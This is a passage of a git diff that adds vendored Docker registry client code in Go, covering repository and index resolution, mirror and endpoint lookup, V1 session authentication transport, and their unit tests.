"localhost/private/moonbase", + CanonicalName: "localhost/private/moonbase", + Official: false, + }, + "localhost/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "localhost/privatebase", + CanonicalName: "localhost/privatebase", + Official: false, + }, + IndexName + "/public/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "public/moonbase", + LocalName: "public/moonbase", + CanonicalName: "docker.io/public/moonbase", + Official: false, + }, + "index." + IndexName + "/public/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "public/moonbase", + LocalName: "public/moonbase", + CanonicalName: "docker.io/public/moonbase", + Official: false, + }, + "ubuntu-12.04-base": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu-12.04-base", + LocalName: "ubuntu-12.04-base", + CanonicalName: "docker.io/library/ubuntu-12.04-base", + Official: true, + }, + IndexName + "/ubuntu-12.04-base": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu-12.04-base", + LocalName: "ubuntu-12.04-base", + CanonicalName: "docker.io/library/ubuntu-12.04-base", + Official: true, + }, + "index." + IndexName + "/ubuntu-12.04-base": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu-12.04-base", + LocalName: "ubuntu-12.04-base", + CanonicalName: "docker.io/library/ubuntu-12.04-base", + Official: true, + }, + } + + for reposName, expectedRepoInfo := range expectedRepoInfos { + named, err := reference.WithName(reposName) + if err != nil { + t.Error(err) + } + + repoInfo, err := ParseRepositoryInfo(named) + if err != nil { + t.Error(err) + } else { + checkEqual(t, repoInfo.Index.Name, expectedRepoInfo.Index.Name, reposName) + checkEqual(t, repoInfo.RemoteName(), expectedRepoInfo.RemoteName, reposName) + checkEqual(t, repoInfo.Name(), expectedRepoInfo.LocalName, reposName) + checkEqual(t, repoInfo.FullName(), expectedRepoInfo.CanonicalName, reposName) + checkEqual(t, repoInfo.Index.Official, expectedRepoInfo.Index.Official, reposName) + checkEqual(t, repoInfo.Official, expectedRepoInfo.Official, reposName) + } + } +} + +func TestNewIndexInfo(t *testing.T) { + testIndexInfo := func(config *serviceConfig, expectedIndexInfos map[string]*registrytypes.IndexInfo) { + for indexName, expectedIndexInfo := range expectedIndexInfos { + index, err := newIndexInfo(config, indexName) + if err != nil { + t.Fatal(err) + } else { + checkEqual(t, index.Name, expectedIndexInfo.Name, indexName+" name") + checkEqual(t, index.Official, expectedIndexInfo.Official, indexName+" is official") + checkEqual(t, index.Secure, expectedIndexInfo.Secure, indexName+" is secure") + checkEqual(t, len(index.Mirrors), len(expectedIndexInfo.Mirrors), indexName+" mirrors") + } + } + } + + config := newServiceConfig(ServiceOptions{}) + noMirrors := []string{} + expectedIndexInfos := map[string]*registrytypes.IndexInfo{ + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: noMirrors, + }, + "index." + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: noMirrors, + }, + "example.com": { + Name: "example.com", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + "127.0.0.1:5000": { + Name: "127.0.0.1:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + } + testIndexInfo(config, expectedIndexInfos) + + publicMirrors := []string{"http://mirror1.local", "http://mirror2.local"} + config = makeServiceConfig(publicMirrors, []string{"example.com"}) + + expectedIndexInfos = map[string]*registrytypes.IndexInfo{ + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: publicMirrors, + }, + "index." + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: publicMirrors, + }, + "example.com": { + Name: "example.com", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "example.com:5000": { + Name: "example.com:5000", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + "127.0.0.1": { + Name: "127.0.0.1", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "127.0.0.1:5000": { + Name: "127.0.0.1:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "other.com": { + Name: "other.com", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + } + testIndexInfo(config, expectedIndexInfos) + + config = makeServiceConfig(nil, []string{"42.42.0.0/16"}) + expectedIndexInfos = map[string]*registrytypes.IndexInfo{ + "example.com": { + Name: "example.com", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "example.com:5000": { + Name: "example.com:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "127.0.0.1": { + Name: "127.0.0.1", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "127.0.0.1:5000": { + Name: "127.0.0.1:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "other.com": { + Name: "other.com", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + } + testIndexInfo(config, expectedIndexInfos) +} + +func TestMirrorEndpointLookup(t *testing.T) { + containsMirror := func(endpoints []APIEndpoint) bool { + for _, pe := range endpoints { + if pe.URL.Host == "my.mirror" { + return true + } + } + return false + } + s := DefaultService{config: makeServiceConfig([]string{"my.mirror"}, nil)} + + imageName, err := reference.WithName(IndexName + "/test/image") + if err != nil { + t.Error(err) + } + pushAPIEndpoints, err := s.LookupPushEndpoints(imageName.Hostname()) + if err != nil { + t.Fatal(err) + } + if containsMirror(pushAPIEndpoints) { + t.Fatal("Push endpoint should not contain mirror") + } + + pullAPIEndpoints, err := s.LookupPullEndpoints(imageName.Hostname()) + if err != nil { + t.Fatal(err) + } + if !containsMirror(pullAPIEndpoints) { + t.Fatal("Pull endpoint should contain mirror") + } +} + +func TestPushRegistryTag(t *testing.T) { + r := spawnTestRegistrySession(t) + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + err = r.PushRegistryTag(repoRef, imageID, "stable", makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } +} + +func TestPushImageJSONIndex(t *testing.T) { + r := spawnTestRegistrySession(t) + imgData := []*ImgData{ + { + ID: "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + Checksum: "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37", + }, + { + ID: "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + Checksum: "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2", + }, + } + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + repoData, err := r.PushImageJSONIndex(repoRef, imgData, false, nil) + if err != nil { + t.Fatal(err) + } + if repoData == nil { + t.Fatal("Expected RepositoryData object") + } + repoData, err = r.PushImageJSONIndex(repoRef, imgData, true, []string{r.indexEndpoint.String()}) + if err != nil { + t.Fatal(err) + } + if repoData == nil { + t.Fatal("Expected RepositoryData object") + } +} + +func TestSearchRepositories(t *testing.T) { + r := spawnTestRegistrySession(t) + results, err := r.SearchRepositories("fakequery", 25) + if err != nil { + t.Fatal(err) + } + if results == nil { + t.Fatal("Expected non-nil SearchResults object") + } + assertEqual(t, results.NumResults, 1, "Expected 1 search results") + assertEqual(t, results.Query, "fakequery", "Expected 'fakequery' as query") + assertEqual(t, results.Results[0].StarCount, 42, "Expected 'fakeimage' to have 42 stars") +} + +func TestTrustedLocation(t *testing.T) { + for _, url := range []string{"http://example.com", "https://example.com:7777", "http://docker.io", "http://test.docker.com", "https://fakedocker.com"} { + req, _ := http.NewRequest("GET", url, nil) + if trustedLocation(req) == true { + t.Fatalf("'%s' shouldn't be detected as a trusted location", url) + } + } + + for _, url := range []string{"https://docker.io", "https://test.docker.com:80"} { + req, _ := http.NewRequest("GET", url, nil) + if trustedLocation(req) == false { + t.Fatalf("'%s' should be detected as a trusted location", url) + } + } +} + +func TestAddRequiredHeadersToRedirectedRequests(t *testing.T) { + for _, urls := range [][]string{ + {"http://docker.io", "https://docker.com"}, + {"https://foo.docker.io:7777", "http://bar.docker.com"}, + {"https://foo.docker.io", "https://example.com"}, + } { + reqFrom, _ := http.NewRequest("GET", urls[0], nil) + reqFrom.Header.Add("Content-Type", "application/json") + reqFrom.Header.Add("Authorization", "super_secret") + reqTo, _ := http.NewRequest("GET", urls[1], nil) + + addRequiredHeadersToRedirectedRequests(reqTo, []*http.Request{reqFrom}) + + if len(reqTo.Header) != 1 { + t.Fatalf("Expected 1 headers, got %d", len(reqTo.Header)) + } + + if reqTo.Header.Get("Content-Type") != "application/json" { + t.Fatal("'Content-Type' should be 'application/json'") + } + + if reqTo.Header.Get("Authorization") != "" { + t.Fatal("'Authorization' should be empty") + } + } + + for _, urls := range [][]string{ + {"https://docker.io", "https://docker.com"}, + {"https://foo.docker.io:7777", "https://bar.docker.com"}, + } { + reqFrom, _ := http.NewRequest("GET", urls[0], nil) + reqFrom.Header.Add("Content-Type", "application/json") + reqFrom.Header.Add("Authorization", "super_secret") + reqTo, _ := http.NewRequest("GET", urls[1], nil) + + addRequiredHeadersToRedirectedRequests(reqTo, []*http.Request{reqFrom}) + + if len(reqTo.Header) != 2 { + t.Fatalf("Expected 2 headers, got %d", len(reqTo.Header)) + } + + if reqTo.Header.Get("Content-Type") != "application/json" { + t.Fatal("'Content-Type' should be 'application/json'") + } + + if reqTo.Header.Get("Authorization") != "super_secret" { + t.Fatal("'Authorization' should be 'super_secret'") + } + } +} + +func TestIsSecureIndex(t *testing.T) { + tests := []struct { + addr string + insecureRegistries []string + expected bool + }{ + {IndexName, nil, true}, + {"example.com", []string{}, true}, + {"example.com", []string{"example.com"}, false}, + {"localhost", []string{"localhost:5000"}, false}, + {"localhost:5000", []string{"localhost:5000"}, false}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"127.0.0.1:5000"}, false}, + {"localhost", nil, false}, + {"localhost:5000", nil, false}, + {"127.0.0.1", nil, false}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1", []string{"example.com"}, false}, + {"example.com", nil, true}, + {"example.com", []string{"example.com"}, false}, + {"127.0.0.1", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"example.com"}, false}, + {"example.com:5000", []string{"42.42.0.0/16"}, false}, + {"example.com", []string{"42.42.0.0/16"}, false}, + {"example.com:5000", []string{"42.42.42.42/8"}, false}, + {"127.0.0.1:5000", []string{"127.0.0.0/8"}, false}, + {"42.42.42.42:5000", []string{"42.1.1.1/8"}, false}, + {"invalid.domain.com", []string{"42.42.0.0/16"}, true}, + {"invalid.domain.com", []string{"invalid.domain.com"}, false}, + {"invalid.domain.com:5000", []string{"invalid.domain.com"}, true}, + {"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, false}, + } + for _, tt := range tests { + config := makeServiceConfig(nil, tt.insecureRegistries) + if sec := isSecureIndex(config, tt.addr); sec != tt.expected { + t.Errorf("isSecureIndex failed for %q %v, expected %v got %v", tt.addr, tt.insecureRegistries, tt.expected, sec) + } + } +} + +type debugTransport struct { + http.RoundTripper + log func(...interface{}) +} + +func (tr debugTransport) RoundTrip(req *http.Request) (*http.Response, error) { + dump, err := httputil.DumpRequestOut(req, false) + if err != nil { + tr.log("could not dump request") + } + tr.log(string(dump)) + resp, err := tr.RoundTripper.RoundTrip(req) + if err != nil { + return nil, err + } + dump, err = httputil.DumpResponse(resp, false) + if err != nil { + tr.log("could not dump response") + } + tr.log(string(dump)) + return resp, err +} diff --git a/vendor/github.com/docker/docker/registry/service.go b/vendor/github.com/docker/docker/registry/service.go new file mode 100644 index 0000000000..596a9c7e5f --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service.go @@ -0,0 +1,304 @@ +package registry + +import ( + "crypto/tls" + "fmt" + "net/http" + "net/url" + "strings" + "sync" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" +) + +const ( + // DefaultSearchLimit is the default value for maximum number of returned search results. + DefaultSearchLimit = 25 +) + +// Service is the interface defining what a registry service should implement. +type Service interface { + Auth(ctx context.Context, authConfig *types.AuthConfig, userAgent string) (status, token string, err error) + LookupPullEndpoints(hostname string) (endpoints []APIEndpoint, err error) + LookupPushEndpoints(hostname string) (endpoints []APIEndpoint, err error) + ResolveRepository(name reference.Named) (*RepositoryInfo, error) + Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) + ServiceConfig() *registrytypes.ServiceConfig + TLSConfig(hostname string) (*tls.Config, error) + LoadInsecureRegistries([]string) error +} + +// DefaultService is a registry service. It tracks configuration data such as a list +// of mirrors. +type DefaultService struct { + config *serviceConfig + mu sync.Mutex +} + +// NewService returns a new instance of DefaultService ready to be +// installed into an engine. +func NewService(options ServiceOptions) *DefaultService { + return &DefaultService{ + config: newServiceConfig(options), + } +} + +// ServiceConfig returns the public registry service configuration. +func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig { + s.mu.Lock() + defer s.mu.Unlock() + + servConfig := registrytypes.ServiceConfig{ + InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0), + IndexConfigs: make(map[string]*(registrytypes.IndexInfo)), + Mirrors: make([]string, 0), + } + + // construct a new ServiceConfig which will not retrieve s.Config directly, + // and look up items in s.config with mu locked + servConfig.InsecureRegistryCIDRs = append(servConfig.InsecureRegistryCIDRs, s.config.ServiceConfig.InsecureRegistryCIDRs...) + + for key, value := range s.config.ServiceConfig.IndexConfigs { + servConfig.IndexConfigs[key] = value + } + + servConfig.Mirrors = append(servConfig.Mirrors, s.config.ServiceConfig.Mirrors...) + + return &servConfig +} + +// LoadInsecureRegistries loads insecure registries for Service +func (s *DefaultService) LoadInsecureRegistries(registries []string) error { + s.mu.Lock() + defer s.mu.Unlock() + + return s.config.LoadInsecureRegistries(registries) +} + +// Auth contacts the public registry with the provided credentials, +// and returns OK if authentication was successful. +// It can be used to verify the validity of a client's credentials. +func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, userAgent string) (status, token string, err error) { + // TODO Use ctx when searching for repositories + serverAddress := authConfig.ServerAddress + if serverAddress == "" { + serverAddress = IndexServer + } + if !strings.HasPrefix(serverAddress, "https://") && !strings.HasPrefix(serverAddress, "http://") { + serverAddress = "https://" + serverAddress + } + u, err := url.Parse(serverAddress) + if err != nil { + return "", "", fmt.Errorf("unable to parse server address: %v", err) + } + + endpoints, err := s.LookupPushEndpoints(u.Host) + if err != nil { + return "", "", err + } + + for _, endpoint := range endpoints { + login := loginV2 + if endpoint.Version == APIVersion1 { + login = loginV1 + } + + status, token, err = login(authConfig, endpoint, userAgent) + if err == nil { + return + } + if fErr, ok := err.(fallbackError); ok { + err = fErr.err + logrus.Infof("Error logging in to %s endpoint, trying next endpoint: %v", endpoint.Version, err) + continue + } + return "", "", err + } + + return "", "", err +} + +// splitReposSearchTerm breaks a search term into an index name and remote name +func splitReposSearchTerm(reposName string) (string, string) { + nameParts := strings.SplitN(reposName, "/", 2) + var indexName, remoteName string + if len(nameParts) == 1 || (!strings.Contains(nameParts[0], ".") && + !strings.Contains(nameParts[0], ":") && nameParts[0] != "localhost") { + // This is a Docker Index repos (ex: samalba/hipache or ubuntu) + // 'docker.io' + indexName = IndexName + remoteName = reposName + } else { + indexName = nameParts[0] + remoteName = nameParts[1] + } + return indexName, remoteName +} + +// Search queries the public registry for images matching the specified +// search terms, and returns the results. +func (s *DefaultService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) { + // TODO Use ctx when searching for repositories + if err := validateNoScheme(term); err != nil { + return nil, err + } + + indexName, remoteName := splitReposSearchTerm(term) + + // Search is a long-running operation, just lock s.config to avoid block others. + s.mu.Lock() + index, err := newIndexInfo(s.config, indexName) + s.mu.Unlock() + + if err != nil { + return nil, err + } + + // *TODO: Search multiple indexes. + endpoint, err := NewV1Endpoint(index, userAgent, http.Header(headers)) + if err != nil { + return nil, err + } + + var client *http.Client + if authConfig != nil && authConfig.IdentityToken != "" && authConfig.Username != "" { + creds := NewStaticCredentialStore(authConfig) + scopes := []auth.Scope{ + auth.RegistryScope{ + Name: "catalog", + Actions: []string{"search"}, + }, + } + + modifiers := DockerHeaders(userAgent, nil) + v2Client, foundV2, err := v2AuthHTTPClient(endpoint.URL, endpoint.client.Transport, modifiers, creds, scopes) + if err != nil { + if fErr, ok := err.(fallbackError); ok { + logrus.Errorf("Cannot use identity token for search, v2 auth not supported: %v", fErr.err) + } else { + return nil, err + } + } else if foundV2 { + // Copy non transport http client features + v2Client.Timeout = endpoint.client.Timeout + v2Client.CheckRedirect = endpoint.client.CheckRedirect + v2Client.Jar = endpoint.client.Jar + + logrus.Debugf("using v2 client for search to %s", endpoint.URL) + client = v2Client + } + } + + if client == nil { + client = endpoint.client + if err := authorizeClient(client, authConfig, endpoint); err != nil { + return nil, err + } + } + + r := newSession(client, authConfig, endpoint) + + if index.Official { + localName := remoteName + if strings.HasPrefix(localName, "library/") { + // If pull "library/foo", it's stored locally under "foo" + localName = strings.SplitN(localName, "/", 2)[1] + } + + return r.SearchRepositories(localName, limit) + } + return r.SearchRepositories(remoteName, limit) +} + +// ResolveRepository splits a repository name into its components +// and configuration of the associated registry. +func (s *DefaultService) ResolveRepository(name reference.Named) (*RepositoryInfo, error) { + s.mu.Lock() + defer s.mu.Unlock() + return newRepositoryInfo(s.config, name) +} + +// APIEndpoint represents a remote API endpoint +type APIEndpoint struct { + Mirror bool + URL *url.URL + Version APIVersion + Official bool + TrimHostname bool + TLSConfig *tls.Config +} + +// ToV1Endpoint returns a V1 API endpoint based on the APIEndpoint +func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + return newV1Endpoint(*e.URL, e.TLSConfig, userAgent, metaHeaders) +} + +// TLSConfig constructs a client TLS configuration based on server defaults +func (s *DefaultService) TLSConfig(hostname string) (*tls.Config, error) { + s.mu.Lock() + defer s.mu.Unlock() + + return newTLSConfig(hostname, isSecureIndex(s.config, hostname)) +} + +// tlsConfig constructs a client TLS configuration based on server defaults +func (s *DefaultService) tlsConfig(hostname string) (*tls.Config, error) { + return newTLSConfig(hostname, isSecureIndex(s.config, hostname)) +} + +func (s *DefaultService) tlsConfigForMirror(mirrorURL *url.URL) (*tls.Config, error) { + return s.tlsConfig(mirrorURL.Host) +} + +// LookupPullEndpoints creates a list of endpoints to try to pull from, in order of preference. +// It gives preference to v2 endpoints over v1, mirrors over the actual +// registry, and HTTPS over plain HTTP. +func (s *DefaultService) LookupPullEndpoints(hostname string) (endpoints []APIEndpoint, err error) { + s.mu.Lock() + defer s.mu.Unlock() + + return s.lookupEndpoints(hostname) +} + +// LookupPushEndpoints creates a list of endpoints to try to push to, in order of preference. +// It gives preference to v2 endpoints over v1, and HTTPS over plain HTTP. +// Mirrors are not included. +func (s *DefaultService) LookupPushEndpoints(hostname string) (endpoints []APIEndpoint, err error) { + s.mu.Lock() + defer s.mu.Unlock() + + allEndpoints, err := s.lookupEndpoints(hostname) + if err == nil { + for _, endpoint := range allEndpoints { + if !endpoint.Mirror { + endpoints = append(endpoints, endpoint) + } + } + } + return endpoints, err +} + +func (s *DefaultService) lookupEndpoints(hostname string) (endpoints []APIEndpoint, err error) { + endpoints, err = s.lookupV2Endpoints(hostname) + if err != nil { + return nil, err + } + + if s.config.V2Only { + return endpoints, nil + } + + legacyEndpoints, err := s.lookupV1Endpoints(hostname) + if err != nil { + return nil, err + } + endpoints = append(endpoints, legacyEndpoints...) + + return endpoints, nil +} diff --git a/vendor/github.com/docker/docker/registry/service_v1.go b/vendor/github.com/docker/docker/registry/service_v1.go new file mode 100644 index 0000000000..1d251aec6e --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service_v1.go @@ -0,0 +1,40 @@ +package registry + +import "net/url" + +func (s *DefaultService) lookupV1Endpoints(hostname string) (endpoints []APIEndpoint, err error) { + if hostname == DefaultNamespace || hostname == DefaultV2Registry.Host || hostname == IndexHostname { + return []APIEndpoint{}, nil + } + + tlsConfig, err := s.tlsConfig(hostname) + if err != nil { + return nil, err + } + + endpoints = []APIEndpoint{ + { + URL: &url.URL{ + Scheme: "https", + Host: hostname, + }, + Version: APIVersion1, + TrimHostname: true, + TLSConfig: tlsConfig, + }, + } + + if tlsConfig.InsecureSkipVerify { + endpoints = append(endpoints, APIEndpoint{ // or this + URL: &url.URL{ + Scheme: "http", + Host: hostname, + }, + Version: APIVersion1, + TrimHostname: true, + // used to check if supposed to be secure via InsecureSkipVerify + TLSConfig: tlsConfig, + }) + } + return endpoints, nil +} diff --git a/vendor/github.com/docker/docker/registry/service_v1_test.go b/vendor/github.com/docker/docker/registry/service_v1_test.go new file mode 100644 index 0000000000..bd15dfffb8 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service_v1_test.go @@ -0,0 +1,23 @@ +package registry + +import "testing" + +func TestLookupV1Endpoints(t *testing.T) { + s := NewService(ServiceOptions{}) + + cases := []struct { + hostname string + expectedLen int + }{ + {"example.com", 1}, + {DefaultNamespace, 0}, + {DefaultV2Registry.Host, 0}, + {IndexHostname, 0}, + } + + for _, c := range cases { + if ret, err := s.lookupV1Endpoints(c.hostname); err != nil || len(ret) != c.expectedLen { + t.Errorf("lookupV1Endpoints(`"+c.hostname+"`) returned %+v and %+v", ret, err) + } + } +} diff --git a/vendor/github.com/docker/docker/registry/service_v2.go b/vendor/github.com/docker/docker/registry/service_v2.go new file mode 100644 index 0000000000..228d745f8c --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service_v2.go @@ -0,0 +1,78 @@ +package registry + +import ( + "net/url" + "strings" + + "github.com/docker/go-connections/tlsconfig" +) + +func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndpoint, err error) { + tlsConfig := tlsconfig.ServerDefault() + if hostname == DefaultNamespace || hostname == IndexHostname { + // v2 mirrors + for _, mirror := range s.config.Mirrors { + if !strings.HasPrefix(mirror, "http://") && !strings.HasPrefix(mirror, "https://") { + mirror = "https://" + mirror + } + mirrorURL, err := url.Parse(mirror) + if err != nil { + return nil, err + } + mirrorTLSConfig, err := s.tlsConfigForMirror(mirrorURL) + if err != nil { + return nil, err + } + endpoints = append(endpoints, APIEndpoint{ + URL: mirrorURL, + // guess mirrors are v2 + Version: APIVersion2, + Mirror: true, + TrimHostname: true, + TLSConfig: mirrorTLSConfig, + }) + } + // v2 registry + endpoints = append(endpoints, APIEndpoint{ + URL: DefaultV2Registry, + Version: APIVersion2, + Official: true, + TrimHostname: true, + TLSConfig: tlsConfig, + }) + + return endpoints, nil + } + + tlsConfig, err = s.tlsConfig(hostname) + if err != nil { + return nil, err + } + + endpoints = []APIEndpoint{ + { + URL: &url.URL{ + Scheme: "https", + Host: hostname, + }, + Version: APIVersion2, + TrimHostname: true, + TLSConfig: tlsConfig, + }, + } + + if tlsConfig.InsecureSkipVerify { + endpoints = append(endpoints, APIEndpoint{ + URL: &url.URL{ + Scheme: "http", + Host: hostname, + }, + Version: APIVersion2, + TrimHostname: true, + // used to check if supposed to be secure via InsecureSkipVerify + TLSConfig: tlsConfig, + }) + } + + return endpoints, nil +} diff --git a/vendor/github.com/docker/docker/registry/session.go b/vendor/github.com/docker/docker/registry/session.go new file mode 100644 index 0000000000..72e286ab44 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/session.go @@ -0,0 +1,783 @@ +package registry + +import ( + "bytes" + "crypto/sha256" + "errors" + "sync" + // this is required for some certificates + _ "crypto/sha512" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/http/cookiejar" + "net/url" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/tarsum" + "github.com/docker/docker/reference" +) + +var ( + // ErrRepoNotFound is returned if the repository didn't exist on the + // remote side + ErrRepoNotFound = errors.New("Repository not found") +) + +// A Session is used to communicate with a V1 registry +type Session struct { + indexEndpoint *V1Endpoint + client *http.Client + // TODO(tiborvass): remove authConfig + authConfig *types.AuthConfig + id string +} + +type authTransport struct { + http.RoundTripper + *types.AuthConfig + + alwaysSetBasicAuth bool + token []string + + mu sync.Mutex // guards modReq + modReq map[*http.Request]*http.Request // original -> modified +} + +// AuthTransport handles the auth layer when communicating with a v1 registry (private or official) +// +// For private v1 registries, set alwaysSetBasicAuth to true. +// +// For the official v1 registry, if there isn't already an Authorization header in the request, +// but there is an X-Docker-Token header set to true, then Basic Auth will be used to set the Authorization header. +// After sending the request with the provided base http.RoundTripper, if an X-Docker-Token header, representing +// a token, is present in the response, then it gets cached and sent in the Authorization header of all subsequent +// requests. +// +// If the server sends a token without the client having requested it, it is ignored. +// +// This RoundTripper also has a CancelRequest method important for correct timeout handling. +func AuthTransport(base http.RoundTripper, authConfig *types.AuthConfig, alwaysSetBasicAuth bool) http.RoundTripper { + if base == nil { + base = http.DefaultTransport + } + return &authTransport{ + RoundTripper: base, + AuthConfig: authConfig, + alwaysSetBasicAuth: alwaysSetBasicAuth, + modReq: make(map[*http.Request]*http.Request), + } +} + +// cloneRequest returns a clone of the provided *http.Request. +// The clone is a shallow copy of the struct and its Header map. +func cloneRequest(r *http.Request) *http.Request { + // shallow copy of the struct + r2 := new(http.Request) + *r2 = *r + // deep copy of the Header + r2.Header = make(http.Header, len(r.Header)) + for k, s := range r.Header { + r2.Header[k] = append([]string(nil), s...) + } + + return r2 +} + +// RoundTrip changes an HTTP request's headers to add the necessary +// authentication-related headers +func (tr *authTransport) RoundTrip(orig *http.Request) (*http.Response, error) { + // Authorization should not be set on 302 redirect for untrusted locations. + // This logic mirrors the behavior in addRequiredHeadersToRedirectedRequests. + // As the authorization logic is currently implemented in RoundTrip, + // a 302 redirect is detected by looking at the Referrer header as go http package adds said header. + // This is safe as Docker doesn't set Referrer in other scenarios. + if orig.Header.Get("Referer") != "" && !trustedLocation(orig) { + return tr.RoundTripper.RoundTrip(orig) + } + + req := cloneRequest(orig) + tr.mu.Lock() + tr.modReq[orig] = req + tr.mu.Unlock() + + if tr.alwaysSetBasicAuth { + if tr.AuthConfig == nil { + return nil, errors.New("unexpected error: empty auth config") + } + req.SetBasicAuth(tr.Username, tr.Password) + return tr.RoundTripper.RoundTrip(req) + } + + // Don't override + if req.Header.Get("Authorization") == "" { + if req.Header.Get("X-Docker-Token") == "true" && tr.AuthConfig != nil && len(tr.Username) > 0 { + req.SetBasicAuth(tr.Username, tr.Password) + } else if len(tr.token) > 0 { + req.Header.Set("Authorization", "Token "+strings.Join(tr.token, ",")) + } + } + resp, err := tr.RoundTripper.RoundTrip(req) + if err != nil { + delete(tr.modReq, orig) + return nil, err + } + if len(resp.Header["X-Docker-Token"]) > 0 { + tr.token = resp.Header["X-Docker-Token"] + } + resp.Body = &ioutils.OnEOFReader{ + Rc: resp.Body, + Fn: func() { + tr.mu.Lock() + delete(tr.modReq, orig) + tr.mu.Unlock() + }, + } + return resp, nil +} + +// CancelRequest cancels an in-flight request by closing its connection. +func (tr *authTransport) CancelRequest(req *http.Request) { + type canceler interface { + CancelRequest(*http.Request) + } + if cr, ok := tr.RoundTripper.(canceler); ok { + tr.mu.Lock() + modReq := tr.modReq[req] + delete(tr.modReq, req) + tr.mu.Unlock() + cr.CancelRequest(modReq) + } +} + +func authorizeClient(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) error { + var alwaysSetBasicAuth bool + + // If we're working with a standalone private registry over HTTPS, send Basic Auth headers + // alongside all our requests. + if endpoint.String() != IndexServer && endpoint.URL.Scheme == "https" { + info, err := endpoint.Ping() + if err != nil { + return err + } + if info.Standalone && authConfig != nil { + logrus.Debugf("Endpoint %s is eligible for private registry. Enabling decorator.", endpoint.String()) + alwaysSetBasicAuth = true + } + } + + // Annotate the transport unconditionally so that v2 can + // properly fallback on v1 when an image is not found. + client.Transport = AuthTransport(client.Transport, authConfig, alwaysSetBasicAuth) + + jar, err := cookiejar.New(nil) + if err != nil { + return errors.New("cookiejar.New is not supposed to return an error") + } + client.Jar = jar + + return nil +} + +func newSession(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) *Session { + return &Session{ + authConfig: authConfig, + client: client, + indexEndpoint: endpoint, + id: stringid.GenerateRandomID(), + } +} + +// NewSession creates a new session +// TODO(tiborvass): remove authConfig param once registry client v2 is vendored +func NewSession(client *http.Client, authConfig *types.AuthConfig, endpoint *V1Endpoint) (*Session, error) { + if err := authorizeClient(client, authConfig, endpoint); err != nil { + return nil, err + } + + return newSession(client, authConfig, endpoint), nil +} + +// ID returns this registry session's ID. +func (r *Session) ID() string { + return r.id +} + +// GetRemoteHistory retrieves the history of a given image from the registry. +// It returns a list of the parent's JSON files (including the requested image). +func (r *Session) GetRemoteHistory(imgID, registry string) ([]string, error) { + res, err := r.client.Get(registry + "images/" + imgID + "/ancestry") + if err != nil { + return nil, err + } + defer res.Body.Close() + if res.StatusCode != 200 { + if res.StatusCode == 401 { + return nil, errcode.ErrorCodeUnauthorized.WithArgs() + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res) + } + + var history []string + if err := json.NewDecoder(res.Body).Decode(&history); err != nil { + return nil, fmt.Errorf("Error while reading the http response: %v", err) + } + + 